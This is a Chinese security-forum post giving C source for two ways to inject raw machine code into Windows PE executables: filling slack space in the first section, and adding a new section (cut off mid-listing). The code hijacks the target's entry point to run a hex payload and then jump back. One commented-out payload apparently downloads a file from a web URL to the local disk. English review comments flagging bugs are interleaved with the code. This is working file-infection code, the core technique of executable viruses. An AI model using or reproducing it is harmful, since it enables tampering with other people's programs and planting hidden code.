[原创]两种方式实现注入机器码

文章作者:小浩
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

PE插缝:
Code Language : C
  1. //by 小浩 Q82602935
  2. #include \"stdafx.h\"
  3. #include <io.h>
  4. #include <sys\stat.h>
  5. #include <fcntl.h>
  6. #include <stdio.h>
  7.  
  8.  
  9.  
/* Offsets that GetPeInfo derives from the target's first section header and
   that WriteCodeTofile consumes. Each field is either a file offset or an RVA,
   as noted; all arithmetic is unsigned DWORD. */
typedef struct tagPeInfo
{
    DWORD dwPeNewEntryAddress;   /* RVA of the written code: dwPeEntryoffset + dwPeCodeoffset */
    DWORD dwPeOldEntryAddress;   /* original OptionalHeader.AddressOfEntryPoint (OEP) */
    DWORD dwPePhysicalSize;      /* section_header[0].SizeOfRawData */
    DWORD dwPePhysicalAddress;   /* section_header[0].PointerToRawData (file offset) */
    DWORD dwPeVirtualSize;       /* section_header[0].Misc.VirtualSize */
    DWORD dwPeAddress;           /* IMAGE_DOS_HEADER.e_lfanew: file offset of the PE signature */
    DWORD dwPegapsize;           /* SizeOfRawData - VirtualSize; wraps to a huge value if VirtualSize is larger */
    DWORD dwPeCodeoffset;        /* OptionalHeader.BaseOfCode - PointerToRawData (RVA-to-file-offset delta) */
    DWORD dwPeEntryoffset;       /* PointerToRawData + VirtualSize rounded up to 16: file offset the code is written at */
}PeInfo,*PPeInfo;
  22.  
  23.  
/* Hand-rolled view of the NT headers: Signature, IMAGE_FILE_HEADER and
   IMAGE_OPTIONAL_HEADER (the IMAGE_NT_HEADERS32 layout) followed by the first
   six section headers. NOTE(review): this assumes the section table starts
   right after a full-size optional header; the real start is
   FileHeader.SizeOfOptionalHeader bytes past the file header, and only
   FileHeader.NumberOfSections entries exist. The code below only reads
   section_header[0]. */
typedef struct PE_HEADER_MAP
{
    DWORD Signature;                         /* compared against IMAGE_NT_SIGNATURE */
    IMAGE_FILE_HEADER _head;
    IMAGE_OPTIONAL_HEADER opt_head;
    IMAGE_SECTION_HEADER section_header[6];  /* fixed count, not bounded by NumberOfSections */
}peHeader;
  31.  
  32.  
  33.  
  34. /*unsigned char szHexCode[] = {0x6A ,0x40 ,0xE8 ,0x15 ,0x00 ,0x00 ,0x00 ,0xCE ,0xDE ,0xCC,
  35. 0xF5 ,0xBC ,0xFE ,0xCE ,0xAA ,0xC4 ,0xE3 ,0xA3 ,0xAC ,0xBB,
  36. 0xB6 ,0xD3 ,0xAD ,0xC4 ,0xFA ,0xA3 ,0xA1 ,0x00 ,0xE8 ,0x06 ,
  37. 0x00 ,0x00 ,0x00 ,0x68 ,0x65 ,0x6C ,0x6C ,0x6F ,0x00 ,0x6A ,
  38. 0x00 ,0xB8 ,0x8A ,0x05 ,0xD5 ,0x77 ,0xFF ,0xD0 ,0xe9 ,0x00 ,
  39.                                  0x00 ,0x00 ,0x00 };
  40. */
/* Raw machine-code payload (36 bytes) that WriteCodeTofile copies into the
   section gap. Bytes 32..35 are overwritten at runtime with the 4-byte
   entry-point displacement WriteCodeTofile computes (szHexCode[32+i] loop);
   the rest is opaque data. Note this is a mutable global. */
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
  44.  
  45. /*
  46. /*unsigned char szHexCode[]={
  47. 0x8B,0xF4,0x68,0x30,0xF0,0x41,0x00,0xFF,0x15,0x3C,
  48. 0x41,0x42,0x00,0x3B,0xF4,0xE8,0xA4,0x00,0x00,0x00,
  49. 0x89,0x45,0xFC,0x8B,0xF4,0x68,0x1C,0xF0,0x41,0x00,
  50. 0x8B,0x45,0xFC,0x50,0xFF,0x15,0x38,0x41,0x42,0x00,
  51. 0x3B,0xF4,0xE8,0x89,0x00,0x00,0x00,0x89,0x45,0xF8,
  52. 0x6A,0x00,0x6A,0x00,0xE8,0x07,0x00,0x00,0x00,0x63,
  53. 0x3A,0x5C,0x31,0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,
  54. 0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,
  55. 0x77,0x2E,0x62,0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,
  56. 0x6D,0x2F,0x69,0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,
  57. 0x2E,0x67,0x69,0x66,0x00,0x6A,0x00,0xF8,0xFF,0xD0,
  58. 0xe9,0x00,0x00,0x00,0x00};
  59. */
  60.  
  61.  
/**
 * Parses a mapped PE image and fills *Peinfo with the offsets needed to place
 * code in the slack between the first section's VirtualSize and SizeOfRawData.
 *
 * @param vBasepointer  Start of the read-only file view (see InjectCodeToFile).
 * @param Peinfo        Output; only written once all checks have passed.
 * @return 1 on success, 0 after showing a MessageBox if the DOS/NT signatures
 *         are wrong or the first section name does not contain ".text".
 *
 * NOTE(review): the input is untrusted file content, but no field is bounded
 * against the size of the mapping. e_lfanew is followed blindly, so a truncated
 * or crafted header makes the pEheader dereferences read outside the view.
 * Only section_header[0] is examined; the code assumes it is the code section
 * that BaseOfCode points at.
 */
int GetPeInfo(void *vBasepointer,PPeInfo Peinfo)
{
  IMAGE_DOS_HEADER *iDosHeader=(IMAGE_DOS_HEADER*)vBasepointer;
  if(iDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
  {
      MessageBox(NULL,\"Unknown type of file\",\"Unknown type of file\",NULL);
     return 0;
 }
 
 /* NT headers live at e_lfanew; no check that this offset is inside the file. */
 peHeader *pEheader=(peHeader*)((char*)iDosHeader+iDosHeader->e_lfanew);
 if(pEheader->Signature!=IMAGE_NT_SIGNATURE)
 {
     MessageBox(NULL,\"Unknown type of file\",\"Unknown type of file\",NULL);
     return 0;
 }
 
 /* IMAGE_SECTION_HEADER.Name is an 8-byte field that need not be NUL-terminated,
    so strstr may scan past it when all 8 characters are used. */
 char *szRet=strstr((const char*)pEheader->section_header[0].Name,\".text\");
 if(!szRet)
 {
     MessageBox(NULL,\"Unknown type of file\",\"Unknown type of file\",NULL);
     return 0;
 }
 
 Peinfo->dwPeAddress=iDosHeader->e_lfanew;
 
 Peinfo->dwPeVirtualSize=pEheader->section_header[0].Misc.VirtualSize;  //actual (in-memory) length
 
 Peinfo->dwPePhysicalAddress=pEheader->section_header[0].PointerToRawData;  //file offset
 
 Peinfo->dwPePhysicalSize=pEheader->section_header[0].SizeOfRawData;   //raw (on-disk) size
 
 /* Gap size. Unsigned subtraction: if VirtualSize > SizeOfRawData this wraps
    to a huge value and the caller's "No room" check passes wrongly. */
 Peinfo->dwPegapsize=Peinfo->dwPePhysicalSize
     -Peinfo->dwPeVirtualSize;            //gap size
 
 /* Delta between the code section's RVA and its file offset; adding it to a
    file offset inside the section yields the corresponding RVA. */
 Peinfo->dwPeCodeoffset=pEheader->opt_head.BaseOfCode
     -Peinfo->dwPePhysicalAddress;               //difference between the code section in memory and in the file
 
 Peinfo->dwPeEntryoffset=pEheader->section_header[0].PointerToRawData
     +pEheader->section_header[0].Misc.VirtualSize;  //file offset where the code is written
 
 /* Round the write offset up to the next 16-byte boundary. */
 DWORD dwMods=Peinfo->dwPeEntryoffset%16;
 if(dwMods!=0)
 {
     Peinfo->dwPeEntryoffset+=(16-dwMods);
 }
 
 Peinfo->dwPeOldEntryAddress=pEheader->opt_head.AddressOfEntryPoint; //OEP
 Peinfo->dwPeNewEntryAddress=Peinfo->dwPeEntryoffset+Peinfo->dwPeCodeoffset; //new program entry address (RVA)
 return 1;
}
  112.  
/**
 * Serializes dwAddress as four little-endian bytes and returns them as a CString.
 *
 * NOTE(review): the return goes through the CString(LPCSTR) constructor, which
 * copies up to the first 0x00 byte. Any value containing a zero byte (e.g. an
 * RVA below 0x01000000, whose top byte is 0) therefore yields a string shorter
 * than 4; callers that memcpy 4 bytes or call GetAt(i) for i < 4 read past the
 * logical length. Returning a fixed-length construction would avoid this.
 */
CString StrOfDWord(DWORD dwAddress)
{
   unsigned char waddress[4]={0};
   
   /* (char) cast binds before & 0xFF; the result is stored into an unsigned char. */
   waddress[3]=(char)(dwAddress>>24)&0xFF;
   waddress[2]=(char)(dwAddress>>16)&0xFF;
   waddress[1]=(char)(dwAddress>>8 )&0xFF;
   waddress[0]=(char)(dwAddress  )&0xFF;
   
   return waddress;
}
  124.  
/**
 * Patches the file at szFilePath in place: writes the new entry-point RVA into
 * the optional header and copies szHexCode into the section gap described by
 * *Peinfo.
 *
 * @param szFilePath  Path of the target PE file (opened read/write, binary).
 * @param Peinfo      Offsets computed by GetPeInfo.
 * @return 1 on success, 0 after a MessageBox on any failure.
 *
 * NOTE(review): every error return leaves the descriptor open (no _close), and
 * the file may already be half-patched at that point since the entry-point
 * write precedes the payload write. szHexCode (a global) is modified here.
 */
int WriteCodeTofile(char szFilePath[],PPeInfo Peinfo)
{
 
 int nTolen=sizeof(szHexCode);
 
 
 DWORD dwRet;
 int nRet=_open(szFilePath,_O_RDWR | _O_CREAT | _O_BINARY,_S_IREAD | _S_IWRITE);
 /* NOTE(review): _open reports failure with -1, not 0; this test only rejects
    descriptor 0 and lets a real failure (-1) fall through to _lseek/_write. */
 if(!nRet)
 {
   MessageBox(NULL,\"_open Error!\",\"_open Error!\",NULL);
   return 0;
 }
 
 /* e_lfanew + 40 = offset of OptionalHeader.AddressOfEntryPoint
    (4-byte Signature + 20-byte IMAGE_FILE_HEADER + 16 bytes into the optional header). */
 dwRet=_lseek(nRet,(long)Peinfo->dwPeAddress+40,SEEK_SET);
 if(dwRet==-1)
 {
   MessageBox(NULL,\"_lseek Error!\",\"_lseek Error!\",NULL);
   return 0;
 }
 
     char szWaddress[4]={0};
 /* Copies 4 bytes out of the CString's buffer; see the truncation caveat on
    StrOfDWord - a zero byte in the RVA shortens the string. */
 memcpy(szWaddress,StrOfDWord(Peinfo->dwPeNewEntryAddress),4);
 
   dwRet=_write(nRet,szWaddress,4);
     if(dwRet==-1)
 {
       MessageBox(NULL,\"_write Error!\",\"_write Error!\",NULL);
       return 0;
 }
 
/*    CString szMsgA;
   DWORD dwMessageBoxAadaddress;
     HINSTANCE gLibMsg=LoadLibrary(\"user32.dll\");
   dwMessageBoxAadaddress=(DWORD)GetProcAddress(gLibMsg,\"MessageBoxA\");
     szMsgA=StrOfDWord(dwMessageBoxAadaddress);
*/
   /* Displacement from the end of the written payload (new entry + nTolen)
      back to the original entry point, computed as an unsigned negation. */
   CString szOepA;
   DWORD dwAddress;
   dwAddress = 0-(Peinfo->dwPeNewEntryAddress
       -Peinfo->dwPeOldEntryAddress+nTolen);
   szOepA=StrOfDWord(dwAddress);
 
   /* Store the 4 displacement bytes at payload offsets 32..35. GetAt(i) is
      out of range when StrOfDWord returned fewer than 4 characters. */
   for(int i=0;i<4;i++)
   {
       szHexCode[32+i]=szOepA.GetAt(i);
   }
 
   dwRet=_lseek(nRet,(long)Peinfo->dwPeEntryoffset,SEEK_SET);
   if(dwRet==-1)
   {
       MessageBox(NULL,\"_lseek Error!\",\"_lseek Error!\",NULL);
       return 0;
   }
 
   /* Return value is not compared against nTolen, so a short write goes unnoticed. */
   dwRet=_write(nRet,szHexCode,nTolen);
     if(dwRet==-1)
 {
       MessageBox(NULL,\"_write Error!\",\"_write Error!\",NULL);
       return 0;
 }
 
   _close(nRet);
   return 1;
}
  190.  
  191.  
/**
 * Maps the file read-only, extracts the PE offsets with GetPeInfo, checks that
 * the section gap can hold szHexCode, then hands off to WriteCodeTofile.
 *
 * @param szFilePath  Path of the target PE file.
 * @return 1 if WriteCodeTofile was reached (its own result is ignored), 0 on
 *         any earlier failure after a MessageBox.
 *
 * NOTE(review): the early returns leak hFile / hMapping, and a GetPeInfo failure
 * returns without UnmapViewOfFile. Nothing checks that the mapping is at least
 * as large as the headers GetPeInfo dereferences.
 */
int InjectCodeToFile(char szFilePath[])
{
 HANDLE hFile=CreateFile(szFilePath,GENERIC_READ|GENERIC_WRITE,
     FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,0);
 if(hFile==INVALID_HANDLE_VALUE)
 {
     MessageBox(NULL,\"CreateFile Error!\",\"CreateFile Error!\",NULL);
     return 0;
 }
 
 HANDLE hMapping=CreateFileMapping(hFile,0,PAGE_READONLY | SEC_COMMIT,0,0,0);
 if(!hMapping)
 {
     MessageBox(NULL,\"CreateFileMapping Error!\",\"CreateFileMapping Error!\",NULL);
     return 0;
 }
 
 void *vBasepointer=MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0);
 if(!vBasepointer)
 {
     MessageBox(NULL,\"MapViewOfFile Error!\",\"MapViewOfFile Error!\",NULL);
     return 0;
 }
 
 /* The view stays valid after the file and mapping handles are closed. */
 CloseHandle(hFile);
 CloseHandle(hMapping);
 
 PeInfo pEinfo;
 int nRet=GetPeInfo(vBasepointer,&pEinfo);
 if(!nRet)
 return 0;    /* view is left mapped on this path */
 UnmapViewOfFile(vBasepointer);
 
 /* dwPegapsize is SizeOfRawData - VirtualSize as unsigned arithmetic; if it
    wrapped in GetPeInfo this check cannot catch the lack of room. */
 if(pEinfo.dwPegapsize<sizeof(szHexCode))
 {
     MessageBox(NULL,\"No room to write the data!\",\"No room to write the data!\",NULL);
     return 0;
 }
 
 /* Result ignored: this function reports 1 even if the patch failed. */
 WriteCodeTofile(szFilePath,&pEinfo);
 
 return 1;
}
  235.  
  236.  
  237.  
/* Entry point: reads a path from stdin, copies the file to "<path>.bak", then
   calls InjectCodeToFile on the original. NOTE(review): the scanf has no field
   width, so input longer than MAX_PATH-1 overflows szFilePath, and &szFilePath
   passes a char(*)[MAX_PATH] where %s expects a char*. lstrcat can also push
   szFileBak past MAX_PATH, and the CopyFile result is not checked (the second
   listing below does check it). `void main` is non-standard; `int main(void)`
   is the portable form. */
void main()
{
   char szFilePath[MAX_PATH];
   printf(\"Please Input File Path:\");
   scanf(\"%s\",&szFilePath);
 
   char szFileBak[MAX_PATH];
   lstrcpy(szFileBak,szFilePath);
 lstrcat(szFileBak,\".bak\");
   CopyFile(szFilePath,szFileBak,FALSE);   /* backup made before the file is modified */
 
 
 
   InjectCodeToFile(szFilePath);           /* return value ignored */
}
  253. [/code]
  254.  
  255.  
  256. PE添节:
  257. [code]
  258. //转载请注明 By 小浩 QQ:82602935
  259. #include <afx.h>
  260. #include <stdio.h>
  261. #include <assert.h>
  262.  
  263.  
/* Same 36-byte raw machine-code payload as in the first listing, kept as a
   mutable global. Presumably consumed by main below, whose remainder lies
   beyond this excerpt - treat the bytes as opaque data. */
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
 0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
  267.  
  268.  
/**
 * Serializes dwAddress as four little-endian bytes and returns them as a CString.
 * Identical to the helper in the first listing.
 *
 * NOTE(review): CString(LPCSTR) copies up to the first 0x00 byte, so any value
 * with a zero byte (e.g. a small RVA whose top byte is 0) comes back shorter
 * than 4 characters; callers that read 4 bytes from the result go past its
 * logical length. A length-specified construction would avoid this.
 */
CString StrOfDWord(DWORD dwAddress)
{
   unsigned char waddress[4]={0};
   
   /* (char) cast binds before & 0xFF; the result is stored into an unsigned char. */
   waddress[3]=(char)(dwAddress>>24)&0xFF;
   waddress[2]=(char)(dwAddress>>16)&0xFF;
   waddress[1]=(char)(dwAddress>>8 )&0xFF;
   waddress[0]=(char)(dwAddress  )&0xFF;
   
   return waddress;
}
  280.  
  281.  
/**
 * Rounds `size` up to the next multiple of ALIGN_BASE, as used for PE
 * FileAlignment / SectionAlignment arithmetic.
 *
 * @param size        Value to align (int, as in the header fields it is applied to).
 * @param ALIGN_BASE  Alignment granularity; must be non-zero (asserted).
 * @return `size` unchanged when already on a boundary, otherwise the next
 *         boundary above it. Signed arithmetic: very large `size` can overflow.
 */
int Align(int size, int ALIGN_BASE)
{
   assert( 0 != ALIGN_BASE );

   int remainder = size % ALIGN_BASE;
   if (0 == remainder)
   {
      return size;
   }

   /* Drop the partial block, then step to the next full one. */
   return ((size / ALIGN_BASE) + 1) * ALIGN_BASE;
}
  301.  
  302. void main()
  303. {
  304.    char szFilePath[MAX_PATH]={0};
  305.    printf(\"Please Input FilePath:\");
  306.    scanf(\"%s\",&szFilePath);
  307.    
  308.    char szFilaBak[MAX_PATH]={0};
  309.    lstrcpy(szFilaBak,szFilePath);
  310.    lstrcat(szFilaBak,\".bak\");
  311.  int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
  312.  if(!nRet)
  313.    {
  314.        printf(\"CopyFile Error!\r\n\");
  315.        return;
  316.    }
  317.  
  318.    FILE *pFile;
  319.    pFile=fopen(szFilePath,\"rb+\");
  320.    if(pFile==NULL)
  321.    {
  322.        printf(\"fopen Error!\r\n\");
  323.        return;
  324.    }
  325.    fseek(pFile,0,SEEK_SET);
  326.  
  327.  IMAGE_DOS_HEADER iMageDosHeader;
  328.    fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
  329.  if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
  330.    {
  331.        printf(\"Unknown type of file!\r\n\");
  332.        return;
  333.    }
  334.    fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
  335.  
  336.    IMAGE_NT_HEADERS iMageNtHeaders;
  337.    fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
  338.    if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
  339.    {
  340.        printf(\"Unknown type of file!\r\n\");
  341.        return;
  342.    }
  343.  
  344.    int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
  345.  printf(\"%d Segment\r\n\",nNumOfSections);
  346.  
  347.    int nFileAlignMent,nSectionAlignMent;
  348.    nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
  349.    nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
  350.  printf(\"File Align Ment:%x\r\n\",nFileAlignMent);
  351.  printf(\"Section Align Ment:%x\r\n\",nSectionAlignMent);
  352.  
  353.    DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
  354.  printf(\"File OEP:%08x\r\n\",dwOldOEP);
  355.